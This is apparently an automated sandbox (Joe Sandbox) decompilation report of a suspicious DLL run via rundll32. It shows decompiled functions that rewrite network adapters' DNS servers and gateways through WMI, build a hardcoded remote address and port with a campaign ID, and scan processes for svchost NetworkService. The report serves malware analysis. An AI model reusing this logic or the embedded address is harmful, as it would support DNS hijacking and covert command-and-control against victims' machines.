            					if( *((intOrPtr*)(_t266 + 8)) != 0) {
            						_push( *((intOrPtr*)(_t266 + 8)));
            						_t142 = E1000CD02(_t219, 0);
            						_t280 = _t142;
            						_pop(_t219);
            						if(_t142 != 0) {
            							_t219 = _t266 - 0x7c;
            							_push(_t266 - 0x10);
            							_push("SetGateways");
            							_t142 = E10007CDC(_t210, _t266 - 0x7c, _t250, _t254, 0, _t280, _t307);
            							_t281 = _t142;
            							if(_t142 >= 0) {
            								asm("stosd");
            								_t260 = 1;
            								 *((intOrPtr*)(_t266 - 0x38)) = 0;
            								_push( *((intOrPtr*)(_t266 + 8)));
            								 *((intOrPtr*)(_t266 - 0x3c)) = _t260;
            								E1000504D(_t210, _t266 - 0x24, _t250, _t260, 0, _t281, _t307);
            								_t170 =  *((intOrPtr*)(_t266 - 0x24));
            								 *((char*)(_t266 - 4)) = 3;
            								_t282 = _t170;
            								if(_t170 == 0) {
            									_t171 = 0;
            									__eflags = 0;
            								} else {
            									_t171 =  *_t170;
            								}
            								 *((intOrPtr*)(_t266 - 0x2c)) = _t171;
            								_t173 =  *_t210(8, _t260, _t266 - 0x3c);
            								_t261 =  *0x1000e230;
            								 *((intOrPtr*)(_t266 - 0x1c)) = _t173;
            								 *((intOrPtr*)(_t173 + 0xc)) = _t266 - 0x2c;
            								 *_t261(_t266 - 0x4c);
            								 *((intOrPtr*)(_t266 - 0x44)) =  *((intOrPtr*)(_t266 - 0x1c));
            								_t177 = 1;
            								 *((short*)(_t266 - 0x4c)) = 0x2008;
            								 *((intOrPtr*)(_t266 - 0x30)) = _t177;
            								_t178 =  *_t210(3, _t177, _t266 - 0x3c);
            								 *((intOrPtr*)(_t266 - 0x20)) = _t178;
            								 *((intOrPtr*)(_t178 + 0xc)) = _t266 - 0x30;
            								 *_t261(_t266 - 0x5c);
            								_push("DefaultIPGateway");
            								 *((short*)(_t266 - 0x5c)) = 0x2003;
            								 *((intOrPtr*)(_t266 - 0x54)) =  *((intOrPtr*)(_t266 - 0x20));
            								_t183 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 8, _t250, _t261, 0, _t282, _t307)));
            								 *((char*)(_t266 - 4)) = 4;
            								_t283 = _t183;
            								if(_t183 == 0) {
            									_t184 = 0;
            									__eflags = 0;
            								} else {
            									_t184 =  *_t183;
            								}
            								_t239 =  *((intOrPtr*)(_t266 - 0x10));
            								 *((intOrPtr*)( *_t239 + 0x14))(_t239, _t184, 0, _t266 - 0x4c, 0);
            								 *((char*)(_t266 - 4)) = 3;
            								E10007696(_t266 + 8);
            								_push("GatewayCostMetric");
            								_t188 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 8,  *_t239, _t266 - 0x4c, 0, _t283, _t307)));
            								 *((char*)(_t266 - 4)) = 5;
            								_t284 = _t188;
            								if(_t188 == 0) {
            									_t189 = 0;
            									__eflags = 0;
            								} else {
            									_t189 =  *_t188;
            								}
            								_t242 =  *((intOrPtr*)(_t266 - 0x10));
            								 *((intOrPtr*)( *_t242 + 0x14))(_t242, _t189, 0, _t266 - 0x5c, 0);
            								 *((char*)(_t266 - 4)) = 3;
            								E10007696(_t266 + 8);
            								_push("SetGateways");
            								_t193 =  *((intOrPtr*)(E1000504D(_t210, _t266 - 0x34,  *_t242, _t266 - 0x5c, 0, _t284, _t307)));
            								 *((char*)(_t266 - 4)) = 6;
            								if(_t193 == 0) {
            									 *((intOrPtr*)(_t266 + 8)) = 0;
            								} else {
            									 *((intOrPtr*)(_t266 + 8)) =  *_t193;
            								}
            								_t194 =  *((intOrPtr*)(_t266 - 0x18));
            								if(_t194 == 0) {
            									_t250 = 0;
            									__eflags = 0;
            								} else {
            									_t250 =  *_t194;
            								}
            								_t254 = _t266 - 0x28;
            								_t245 =  *((intOrPtr*)(_t266 - 0x78));
            								_t196 =  *((intOrPtr*)( *_t245 + 0x60))(_t245, _t250,  *((intOrPtr*)(_t266 + 8)), 0, 0,  *((intOrPtr*)(_t266 - 0x10)), _t254, 0);
            								_t246 =  *((intOrPtr*)(_t266 - 0x34));
            								if( *((intOrPtr*)(_t266 - 0x34)) != 0) {
            									E1000515C(_t196, _t246);
            								}
            								0x10035685(_t254,  *((intOrPtr*)(_t266 - 0x1c)));
            								 *_t254();
            								_t142 =  *_t254( *((intOrPtr*)(_t266 - 0x20)));
            								_t219 =  *((intOrPtr*)(_t266 - 0x24));
            								 *((char*)(_t266 - 4)) = 2;
            								if( *((intOrPtr*)(_t266 - 0x24)) != 0) {
            									_t142 = E1000515C(_t142, _t219);
            								}
            							}
            						}
            					}
            					if( *((intOrPtr*)(_t266 + 0xc)) == 0) {
            						L31:
            						if( *((intOrPtr*)(_t266 + 0x10)) == 0) {
            							L57:
            							_t220 =  *((intOrPtr*)(_t266 - 0x18));
            							_pop(_t209);
            							if( *((intOrPtr*)(_t266 - 0x18)) != 0) {
            								_t142 = E1000515C(_t142, _t220);
            								 *((intOrPtr*)(_t266 - 0x18)) = 0;
            							}
            							goto L59;
            						}
            						_push( *((intOrPtr*)(_t266 + 0x10)));
            						_t142 = E1000CD02(_t219, 0);
            						_t292 = _t142;
            						if(_t142 == 0) {
            							goto L57;
            						}
            						L33:
            						_push(_t266 - 0x10);
            						_push("SetDNSServerSearchOrder");
            						_t142 = E10007CDC(_t210, _t266 - 0x7c, _t250, _t254, 0, _t292, _t307);
            						_t293 = _t142;
            						if(_t142 >= 0) {
            							_push( *((intOrPtr*)(_t266 + 0xc)));
            							asm("stosd");
            							asm("stosd");
            							asm("stosd");
            							 *((intOrPtr*)(_t266 - 0x58)) = 0;
            							 *((intOrPtr*)(_t266 - 0x5c)) = 2;
            							E1000504D(_t210, _t266 + 0xc, _t250, _t266 - 0x58, 0, _t293, _t307);
            							_push( *((intOrPtr*)(_t266 + 0x10)));
            							 *((char*)(_t266 - 4)) = 7;
            							E1000504D(_t210, _t266 + 8, _t250, _t266 - 0x58, 0, _t293, _t307);
            							_t150 =  *((intOrPtr*)(_t266 + 0xc));
            							 *((char*)(_t266 - 4)) = 8;
            							if(_t150 == 0) {
            								_t151 = 0;
            								__eflags = 0;
            							} else {
            								_t151 =  *_t150;
            							}
            							 *((intOrPtr*)(_t266 - 0x3c)) = _t151;
            							_t152 =  *((intOrPtr*)(_t266 + 8));
            							_t295 = _t152;
            							if(_t152 == 0) {
            								_t153 = 0;
            								__eflags = 0;
            							} else {
            								_t153 =  *_t152;
            							}
            							 *((intOrPtr*)(_t266 - 0x38)) = _t153;
            							_t256 =  *_t210(8, 1, _t266 - 0x5c);
            							 *((intOrPtr*)(_t256 + 0xc)) = _t266 - 0x3c;
            							 *0x1000e230(_t266 - 0x4c);
            							_push("DNSServerSearchOrder");
            							 *((short*)(_t266 - 0x4c)) = 0x2008;
            							 *((intOrPtr*)(_t266 - 0x44)) = _t256;
            							_t160 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 0x10, _t250, _t256, 0, _t295, _t307)));
            							 *((char*)(_t266 - 4)) = 9;
            							if(_t160 == 0) {
            								_t161 = 0;
            								__eflags = 0;
            							} else {
            								_t161 =  *_t160;
            							}
            							_t226 =  *((intOrPtr*)(_t266 - 0x10));
            							_t257 = _t266 - 0x4c;
            							_t251 =  *_t226;
            							_t162 =  *((intOrPtr*)( *_t226 + 0x14))(_t226, _t161, 0, _t266 - 0x4c, 0);
            							_t227 =  *((intOrPtr*)(_t266 + 0x10));
            							 *((char*)(_t266 - 4)) = 8;
            							_t297 =  *((intOrPtr*)(_t266 + 0x10));
            							if( *((intOrPtr*)(_t266 + 0x10)) != 0) {
            								E1000515C(_t162, _t227);
            							}
            							_push("SetDNSServerSearchOrder");
            							_t164 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 0x10, _t251, _t257, 0, _t297, _t307)));
            							 *((char*)(_t266 - 4)) = 0xa;
            							if(_t164 == 0) {
            								_t165 = 0;
            								__eflags = 0;
            							} else {
            								_t165 =  *_t164;
            							}
            							_t229 =  *((intOrPtr*)(_t266 - 0x18));
            							if(_t229 == 0) {
            								_t250 = 0;
            								__eflags = 0;
            							} else {
            								_t250 =  *_t229;
            							}
            							_t230 =  *((intOrPtr*)(_t266 - 0x78));
            							_t142 =  *((intOrPtr*)( *_t230 + 0x60))(_t230, _t250, _t165, 0, 0,  *((intOrPtr*)(_t266 - 0x10)), _t266 - 0x28, 0);
            							_t231 =  *((intOrPtr*)(_t266 + 0x10));
            							if( *((intOrPtr*)(_t266 + 0x10)) != 0) {
            								_t142 = E1000515C(_t142, _t231);
            								 *((intOrPtr*)(_t266 + 0x10)) = 0;
            							}
            							_t232 =  *((intOrPtr*)(_t266 + 8));
            							if( *((intOrPtr*)(_t266 + 8)) != 0) {
            								_t142 = E1000515C(_t142, _t232);
            								 *((intOrPtr*)(_t266 + 8)) = 0;
            							}
            							_t233 =  *((intOrPtr*)(_t266 + 0xc));
            							if( *((intOrPtr*)(_t266 + 0xc)) != 0) {
            								_t142 = E1000515C(_t142, _t233);
            								 *((intOrPtr*)(_t266 + 0xc)) = 0;
            							}
            						}
            						goto L57;
            					}
            					_push( *((intOrPtr*)(_t266 + 0xc)));
            					_t142 = E1000CD02(_t219, 0);
            					_pop(_t219);
            					if(_t142 != 0) {
            						goto L33;
            					}
            					goto L31;
            				}
            			}









































            0x1000721f
            0x1000721f
            0x1000721f
            0x1000721f
            0x1000721f
            0x10007224
            0x1000722c
            0x10007230
            0x10007237
            0x1000723c
            0x10007244
            0x1000724e
            0x100075fc
            0x100075fc
            0x100075ff
            0x1000760b
            0x10007613
            0x10007614
            0x1000761a
            0x1000761c
            0x10007622
            0x10007629
            0x10007254
            0x10007254
            0x10007255
            0x1000725b
            0x1000725f
            0x10007264
            0x10007267
            0x1000726c
            0x1000726e
            0x10007276
            0x10007277
            0x10007280
            0x10007282
            0x10007286
            0x1000728d
            0x1000728d
            0x10007295
            0x1000729f
            0x100072a2
            0x100072a2
            0x1000726c
            0x100072aa
            0x100072af
            0x100072b1
            0x100075ec
            0x100075ec
            0x100075ef
            0x100075f2
            0x100075f4
            0x100075f9
            0x100075f9
            0x00000000
            0x100075f2
            0x100072b7
            0x100072b8
            0x100072c0
            0x100072c8
            0x100072cb
            0x100072cc
            0x100072d0
            0x100072d8
            0x100072de
            0x100072e1
            0x100072e4
            0x100072ea
            0x100072ed
            0x100072f2
            0x100072f4
            0x100072f5
            0x100072fe
            0x10007301
            0x10007302
            0x10007307
            0x1000730c
            0x1000730e
            0x10007319
            0x1000731f
            0x10007320
            0x10007323
            0x10007326
            0x10007329
            0x1000732e
            0x10007331
            0x10007335
            0x10007337
            0x1000733d
            0x1000733d
            0x10007339
            0x10007339
            0x10007339
            0x1000733f
            0x10007349
            0x1000734b
            0x10007354
            0x10007357
            0x1000735e
            0x10007365
            0x10007368
            0x1000736c
            0x10007376
            0x10007379
            0x1000737e
            0x10007381
            0x10007388
            0x1000738d
            0x10007395
            0x1000739b
            0x100073a3
            0x100073a5
            0x100073a9
            0x100073ab
            0x100073b1
            0x100073b1
            0x100073ad
            0x100073ad
            0x100073ad
            0x100073b3
            0x100073c0
            0x100073c6
            0x100073ca
            0x100073cf
            0x100073dc
            0x100073de
            0x100073e2
            0x100073e4
            0x100073ea
            0x100073ea
            0x100073e6
            0x100073e6
            0x100073e6
            0x100073ec
            0x100073f9
            0x100073ff
            0x10007403
            0x10007408
            0x10007415
            0x10007417
            0x1000741d
            0x10007426
            0x1000741f
            0x10007421
            0x10007421
            0x10007429
            0x1000742e
            0x10007434
            0x10007434
            0x10007430
            0x10007430
            0x10007430
            0x10007436
            0x1000743a
            0x1000744a
            0x1000744d
            0x10007452
            0x10007454
            0x10007454
            0x1000745d
            0x10007462
            0x10007467
            0x10007469
            0x1000746c
            0x10007472
            0x10007474
            0x10007474
            0x10007472
            0x1000730e
            0x100072f5
            0x1000747c
            0x1000748b
            0x1000748e
            0x100075dc
            0x100075dc
            0x100075df
            0x100075e2
            0x100075e4
            0x100075e9
            0x100075e9
            0x00000000
            0x100075e2
            0x10007494
            0x10007497
            0x1000749c
            0x1000749f
            0x00000000
            0x00000000
            0x100074a5
            0x100074ab
            0x100074ac
            0x100074b1
            0x100074b6
            0x100074b8
            0x100074c3
            0x100074c9
            0x100074ca
            0x100074cb
            0x100074cc
            0x100074cf
            0x100074d6
            0x100074db
            0x100074e1
            0x100074e5
            0x100074ea
            0x100074ed
            0x100074f3
            0x100074f9
            0x100074f9
            0x100074f5
            0x100074f5
            0x100074f5
            0x100074fb
            0x100074fe
            0x10007501
            0x10007503
            0x10007509
            0x10007509
            0x10007505
            0x10007505
            0x10007505
            0x1000750b
            0x10007518
            0x1000751d
            0x10007524
            0x1000752a
            0x10007532
            0x10007538
            0x10007540
            0x10007542
            0x10007548
            0x1000754e
            0x1000754e
            0x1000754a
            0x1000754a
            0x1000754a
            0x10007550
            0x10007553
            0x10007558
            0x1000755d
            0x10007560
            0x10007563
            0x10007567
            0x10007569
            0x1000756b
            0x1000756b
            0x10007570
            0x1000757d
            0x1000757f
            0x10007585
            0x1000758b
            0x1000758b
            0x10007587
            0x10007587
            0x10007587
            0x1000758d
            0x10007592
            0x10007598
            0x10007598
            0x10007594
            0x10007594
            0x10007594
            0x1000759a
            0x100075ac
            0x100075af
            0x100075b4
            0x100075b6
            0x100075bb
            0x100075bb
            0x100075be
            0x100075c3
            0x100075c5
            0x100075ca
            0x100075ca
            0x100075cd
            0x100075d2
            0x100075d4
            0x100075d9
            0x100075d9
            0x100075d2
            0x00000000
            0x100074b8
            0x1000747e
            0x10007481
            0x10007488
            0x10007489
            0x00000000
            0x00000000
            0x00000000
            0x10007489

            APIs
            • SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 10007349
            • VariantInit.OLEAUT32(?), ref: 1000735E
            • SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 10007379
            • VariantInit.OLEAUT32(?), ref: 10007388
              • Part of subcall function 10007A73: VariantInit.OLEAUT32(?), ref: 10007AB2
            • SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007516
            • VariantInit.OLEAUT32(?), ref: 10007524
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitVariant$ArrayCreateSafe
            • String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=
            • API String ID: 2640012081-1668994663
            • Opcode ID: e2ec7862cb05a4d9f0d12a737e0be0343bc246c2bcf18d74e35b6fadba54feab
            • Instruction ID: e82695035937c1bda44e76a486134160da36d7b78c3243b38af4a6a2dd8dd1e6
            • Opcode Fuzzy Hash: e2ec7862cb05a4d9f0d12a737e0be0343bc246c2bcf18d74e35b6fadba54feab
            • Instruction Fuzzy Hash: 7AD14C70D00219EFEB15CFA4C8809EEBBB8FF49781F104019F519AB259DB75AA45CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 35%
            			E10005989(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __eflags, void* __fp0, intOrPtr _a16, intOrPtr _a20, signed int _a28) {
            				intOrPtr _t17;
            				void* _t20;
            				CHAR* _t35;
            				intOrPtr* _t39;
            				CHAR* _t43;
            
            				_t50 = __eflags;
            				_t32 = __edx;
            				_t27 = __ecx;
            				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
            				_push(__ecx);
            				_push(__ebx);
            				_push(__ebp);
            				_push(__esi);
            				_push(__edi);
            				wsprintfA("12071239", "%s", "12071239");
            				0x10031e13();
            				 *_t34(0, "C:\\Windows\\SysWOW64\\rundll32.exe", 0x104);
            				_t43 = "C:\\Users\\alfons\\Desktop\\abc.dll";
            				 *_t34( *0x10016adc, _t43, 0x104);
            				_t35 = "C:\\Users\\alfons\\Desktop";
            				E1000CD0E(_t27, _t35);
            				0x100426e9(_t43);
            				asm("arpl [eax+0x57530020], ax");
            				wsprintfA("C:\\Users\\alfons\\Desktop\\12071239", "%s\\%s", _t35, 0x5c);
            				wsprintfA("C:\\Users\\alfons\\Desktop\\version.txt", "%s\\version.txt", _t35);
            				_t17 = E1000CCAE(wsprintfA("M107.163.56.251:6658", "M%s", "107.163.56.251:6658"), "12071239", _t27, _t32, _t35,  *0x1000e248, _t43, _t50, __fp0, 0x84);
            				_a16 = _t17;
            				_a28 = _a28 & 0x00000000;
            				_t51 = _t17;
            				if(_t17 == 0) {
            					_t39 = 0;
            					__eflags = 0;
            				} else {
            					_t27 = _t17;
            					_t39 = E10008A6A("12071239", _t17, _t32, _t51, __fp0);
            				}
            				_a28 = _a28 | 0xffffffff;
            				_t6 = _t39 + 0x44; // 0x44
            				E1000CD0E(_t27, "ECF4BB570DC9");
            				if(_t39 != 0) {
            					 *((intOrPtr*)( *_t39))(1);
            				}
            				_t20 = 1;
            				 *[fs:0x0] = _a20;
            				return _t20;
            			}








            0x10005989
            0x10005989
            0x10005989
            0x1000598e
            0x10005993
            0x10005994
            0x10005995
            0x10005996
            0x100059a2
            0x100059ae
            0x100059b1
            0x100059c6
            0x100059c9
            0x100059d5
            0x100059d7
            0x100059de
            0x100059e6
            0x100059eb
            0x100059fb
            0x10005a08
            0x10005a20
            0x10005a28
            0x10005a2c
            0x10005a31
            0x10005a33
            0x10005a40
            0x10005a40
            0x10005a35
            0x10005a35
            0x10005a3c
            0x10005a3c
            0x10005a42
            0x10005a47
            0x10005a50
            0x10005a59
            0x10005a61
            0x10005a61
            0x10005a69
            0x10005a6e
            0x10005a76

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: wsprintf
            • String ID: %s\%s$%s\version.txt$107.163.56.251:6658$12071239$12071239$C:\Users\user\Desktop$C:\Users\user\Desktop\12071239$C:\Users\user\Desktop\abc.dll$C:\Users\user\Desktop\version.txt$C:\Windows\SysWOW64\rundll32.exe$ECF4BB570DC9$M%s$M107.163.56.251:6658
            • API String ID: 2111968516-2543497288
            • Opcode ID: 63d324a4be31bdf7c4dbae9d94317d43bbbd32c0b7fea88a460601dc2efd78e7
            • Instruction ID: 79abf1e2baf1fb729ca166858087dd68efaefcd5263c4161144b64841660d7f9
            • Opcode Fuzzy Hash: 63d324a4be31bdf7c4dbae9d94317d43bbbd32c0b7fea88a460601dc2efd78e7
            • Instruction Fuzzy Hash: 741136366003287BF210E7959C45F6F7F5CDF896A6F01412AF700AE181DB72E8808B66
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E10004D36(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
            				void* _t98;
            				intOrPtr* _t102;
            				intOrPtr _t103;
            				void* _t104;
            				intOrPtr* _t111;
            				intOrPtr* _t113;
            				intOrPtr* _t114;
            				intOrPtr* _t121;
            				intOrPtr* _t123;
            				intOrPtr* _t125;
            				intOrPtr* _t127;
            				intOrPtr* _t139;
            				intOrPtr* _t141;
            				intOrPtr* _t143;
            				intOrPtr* _t145;
            				void* _t146;
            				void* _t148;
            				intOrPtr* _t150;
            				void* _t151;
            				void* _t153;
            				intOrPtr* _t163;
            				signed int _t165;
            				intOrPtr _t173;
            				void* _t206;
            				void* _t214;
            				void* _t215;
            				intOrPtr _t216;
            				intOrPtr* _t217;
            				intOrPtr* _t219;
            				void* _t220;
            				void* _t222;
            				void* _t223;
            				void* _t225;
            
            				_t245 = __fp0;
            				_t227 = __eflags;
            				_t202 = __edi;
            				_t161 = __ecx;
            				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
            				E1000CD20(0x182c, __ecx);
            				 *((intOrPtr*)(_t220 - 0x20)) = 0;
            				_t98 = E1000CCFC(0, _t161, __esi, _t220, _t227, _t220 - 0x48);
            				_t223 = _t222 + 0xc;
            				0x1003a410(0, 0, 0, 0, 0x10, __edi, __esi, __ebx);
            				E1002D3DC(_t98, 0, _t161, __edx, __edi, __esi, _t227, _t220, 0, 0xffffffff, 0, 0, 0);
            				 *((intOrPtr*)(_t220 - 0x1c)) = 0;
            				0x100411b4(E100101A8, 0, 1, E100100D8, _t220 - 0x1c, 3, 0, 0, 0);
            				_push(cs);
            				_push( *((intOrPtr*)(_t220 + 8)));
            				 *((intOrPtr*)(_t220 - 0x18)) = 0;
            				_t102 =  *((intOrPtr*)(E100050A1(0, _t220 + 8, __edx, _t202, __esi, _t227, __fp0)));
            				 *(_t220 - 4) = 0;
            				if(_t102 == 0) {
            					_t103 = 0;
            					__eflags = 0;
            				} else {
            					_t103 =  *_t102;
            				}
            				_t163 =  *((intOrPtr*)(_t220 - 0x1c));
            				_t214 = _t220 - 0x18;
            				_t198 =  *_t163;
            				_t104 =  *((intOrPtr*)( *_t163 + 0xc))(_t163, _t103, 0, 0, 0, 0, 0, 0, _t214);
            				_t164 =  *((intOrPtr*)(_t220 + 8));
            				 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
            				_t229 =  *((intOrPtr*)(_t220 + 8));
            				if( *((intOrPtr*)(_t220 + 8)) != 0) {
            					E1000515C(_t104, _t164);
            				}
            				0x1003ed69(_t214,  *((intOrPtr*)(_t220 - 0x18)), 0xa, 0, 0, 3, 3, 0, 0);
            				_t215 = L"SELECT * FROM ";
            				_t165 = 7;
            				memcpy(_t220 - 0x838, _t215, _t165 << 2);
            				asm("movsw");
            				_t206 = _t220 - 0x81a;
            				memset(_t206, 0, 0x1ec << 2);
            				_t225 = _t223 + 0x18;
            				_t207 = _t206 + 0x1ec;
            				asm("stosw");
            				 *((intOrPtr*)(_t220 - 0x10)) = 0;
            				0x1003bb02(_t215, _t220 - 0x838,  *((intOrPtr*)(_t220 + 0xc)));
            				_push(_t220 - 0x838);
            				_t111 =  *((intOrPtr*)(E100050A1(0, _t220 - 0x28, _t198, _t206 + 0x1ec, _t215, _t229, _t245)));
            				 *(_t220 - 4) = 1;
            				_t230 = _t111;
            				if(_t111 == 0) {
            					_t216 = 0;
            					__eflags = 0;
            				} else {
            					_t216 =  *_t111;
            				}
            				_push("WQL");
            				_t113 =  *((intOrPtr*)(E1000504D(0, _t220 + 8, _t198, _t207, _t216, _t230, _t245)));
            				 *(_t220 - 4) = 2;
            				if(_t113 == 0) {
            					_t173 = 0;
            					__eflags = 0;
            				} else {
            					_t173 =  *_t113;
            				}
            				_t114 =  *((intOrPtr*)(_t220 - 0x18));
            				_t199 =  *_t114;
            				_t115 =  *((intOrPtr*)( *_t114 + 0x50))(_t114, _t173, _t216, 0x30, 0, _t220 - 0x10);
            				_t174 =  *((intOrPtr*)(_t220 + 8));
            				if( *((intOrPtr*)(_t220 + 8)) != 0) {
            					_t115 = E1000515C(_t115, _t174);
            					 *((intOrPtr*)(_t220 + 8)) = 0;
            				}
            				_t175 =  *((intOrPtr*)(_t220 - 0x28));
            				 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
            				if( *((intOrPtr*)(_t220 - 0x28)) != 0) {
            					_t115 = E1000515C(_t115, _t175);
            				}
            				 *((intOrPtr*)(_t220 - 0x24)) = 0;
            				if( *((intOrPtr*)(_t220 - 0x10)) == 0) {
            					L32:
            					_pop(_t217);
            					E10025EA7(_t115, 0, _t175, _t199, _t217, _t220, _t243);
            					 *_t217(_t220 - 0x48);
            					 *_t217(_t220 - 0x38);
            					_t121 =  *((intOrPtr*)(_t220 - 0x18));
            					 *((intOrPtr*)( *_t121 + 8))(_t121);
            					_t123 =  *((intOrPtr*)(_t220 - 0x1c));
            					 *((intOrPtr*)( *_t123 + 8))(_t123);
            					_t125 =  *((intOrPtr*)(_t220 - 0x10));
            					 *((intOrPtr*)( *_t125 + 8))(_t125);
            					_t127 =  *((intOrPtr*)(_t220 - 0x14));
            					E10026ED3( *((intOrPtr*)( *_t127 + 8))(_t127), 0,  *_t127, _t199, _t217, _t243);
            					 *[fs:0x0] =  *((intOrPtr*)(_t220 - 0xc));
            					return  *((intOrPtr*)(_t220 - 0x20));
            				} else {
            					_t219 =  *0x1000e230;
            					while(1) {
            						_push(_t220 - 0x24);
            						_t175 = _t220 - 0x14;
            						_push(_t220 - 0x14);
            						_push(1);
            						_push(0xffffffff);
            						_push( *((intOrPtr*)(_t220 - 0x10)));
            						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t220 - 0x10)))) + 0x10))() != 0) {
            							goto L32;
            						}
            						 *_t219(_t220 - 0x48);
            						 *_t219(_t220 - 0x38);
            						 *_t219(_t220 - 0x68);
            						_t139 =  *((intOrPtr*)(_t220 - 0x14));
            						 *((intOrPtr*)(_t220 - 0x30)) = 0;
            						 *((intOrPtr*)( *_t139 + 0x10))(_t139, L"Name", 0, _t220 - 0x48, 0, 0);
            						_t141 =  *((intOrPtr*)(_t220 - 0x14));
            						 *((intOrPtr*)( *_t141 + 0x10))(_t141, L"CommandLine", 0, _t220 - 0x38, 0, 0);
            						_t143 =  *((intOrPtr*)(_t220 - 0x14));
            						_t199 = _t220 - 0x68;
            						_t175 =  *_t143;
            						_t115 =  *((intOrPtr*)( *_t143 + 0x10))(_t143, L"ProcessID", 0, _t220 - 0x68, 0, 0);
            						_t236 =  *((intOrPtr*)(_t220 - 0x30));
            						if( *((intOrPtr*)(_t220 - 0x30)) != 0) {
            							 *(_t220 - 0x58) = 0;
            							_push( *((intOrPtr*)(_t220 - 0x40)));
            							asm("stosd");
            							asm("stosd");
            							asm("stosd");
            							asm("stosw");
            							asm("stosb");
            							_t145 = E100050A1(0, _t220 + 8, _t199, _t220 - 0x57, _t219, _t236, _t245);
            							_t186 =  *_t145;
            							 *(_t220 - 4) = 3;
            							if( *_t145 == 0) {
            								_t146 = 0;
            								__eflags = 0;
            							} else {
            								_t146 = E10005189(_t186, _t199, _t245);
            							}
            							_push(_t146);
            							_t148 = E1000CD0E(_t186, _t220 - 0x58);
            							 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
            							_t189 =  *((intOrPtr*)(_t220 + 8));
            							if( *((intOrPtr*)(_t220 + 8)) != 0) {
            								E1000515C(_t148, _t189);
            								 *((intOrPtr*)(_t220 + 8)) = 0;
            							}
            							_t115 = _t220 - 0x58;
            							0x10033fcb(_t115, "svchost.exe");
            							_t239 = _t115;
            							_t175 = _t219;
            							if(_t115 == 0) {
            								 *((char*)(_t220 - 0x1838)) = 0;
            								_push( *((intOrPtr*)(_t220 - 0x30)));
            								memset(_t220 - 0x1837, _t115, 0x3ff << 2);
            								_t225 = _t225 + 0xc;
            								asm("stosw");
            								asm("stosb");
            								_t150 = E100050A1(0, _t220 + 0xc, _t199, _t220 - 0x1837 + 0x3ff, _t219, _t239, _t245);
            								_t194 =  *_t150;
            								 *(_t220 - 4) = 4;
            								if( *_t150 == 0) {
            									_t151 = 0;
            									__eflags = 0;
            								} else {
            									_t151 = E10005189(_t194, _t199, _t245);
            								}
            								_push(_t151);
            								_t153 = E1000CD0E(_t194, _t220 - 0x1838);
            								 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
            								_t175 =  *((intOrPtr*)(_t220 + 0xc));
            								if( *((intOrPtr*)(_t220 + 0xc)) != 0) {
            									E1000515C(_t153, _t175);
            									 *((intOrPtr*)(_t220 + 0xc)) = 0;
            								}
            								0x10035299(_t220 - 0x1838, "svchost.exe -k NetworkService");
            								asm("fild dword [ebp-0x74f98b40]");
            								_t220 = _t220 + 1;
            								_t115 =  *0x39e04589;
            							}
            						}
            						_t243 =  *((intOrPtr*)(_t220 - 0x10));
            						if( *((intOrPtr*)(_t220 - 0x10)) != 0) {
            							continue;
            						} else {
            							goto L32;
            						}
            					}
            					goto L32;
            				}
            			}




































            0x10004d36
            0x10004d36
            0x10004d36
            0x10004d36
            0x10004d3b
            0x10004d45
            0x10004d56
            0x10004d59
            0x10004d5e
            0x10004d64
            0x10004d75
            0x10004d7d
            0x10004d8e
            0x10004d93
            0x10004d94
            0x10004d9a
            0x10004da2
            0x10004da4
            0x10004da9
            0x10004daf
            0x10004daf
            0x10004dab
            0x10004dab
            0x10004dab
            0x10004db1
            0x10004db4
            0x10004db9
            0x10004dc2
            0x10004dc5
